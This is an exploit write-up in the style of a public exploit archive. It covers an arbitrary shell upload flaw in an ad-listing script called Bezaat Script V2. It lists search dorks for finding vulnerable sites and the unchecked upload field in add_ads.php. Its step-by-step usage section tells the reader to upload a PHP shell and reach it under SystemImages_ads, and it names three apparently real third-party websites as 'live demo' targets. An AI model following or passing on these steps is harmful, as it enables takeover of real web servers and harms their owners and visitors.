######################
# Exploit Title : Bezaat Script V2 Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork 1 : index of /SystemImages_ads/
# Dork 2 : Powed by Greenit Egypt for Information Technology
# Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 15/09/2016
# video Proof : https://youtu.be/AWqN2cng7u4
######################
# [a] DESCRIPTION :
######################
# [+] Bezaat Script It's An Commerce Script
# [+] That Allow you To Add and Menage ads in your Website
# [+] AND an Arbitrary Shell Upload has been Detected in his Script Version
2
# [+] The Other Version Maybe Also infected
######################
# [a] Poc :
######################
# When You want to Upload an Image For ads there is No Extention Check for
the File Uploaded
# Referer: http://127.0.0.1//add_ads.php?cat_id=
# [add_ads.php]  Vulnerable
# Content-Disposition: form-data; name="UploadlogoFile";
filename="shell.php"
# Content-Type: application/octetstream
######################
# [+] USAGE :
######################
# 1.- SELECT A WEBSITE FROM THE DORK ABOVE
# 2.- http://127.0.0.1/add_ads.html or http://127.0.0.1/add_ads.php
# 4.- fill the fields
# 5.- Upload your Shell like :shell.php to Upload Field
# 6.- Shell Directory :
http://127.0.0.1/admin/SystemImages_ads/[NUM]_shell.php
#                       http://127.0.0.1/SystemImages_ads/[NUM]_shell.php
######################
# [a] Live Demo :
######################
# http://www.dalil1808080.com/add_ads.html
# http://www.al3ta.com/add_ads.php
# http://www.sooqalbalad.com/add_ads.html
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################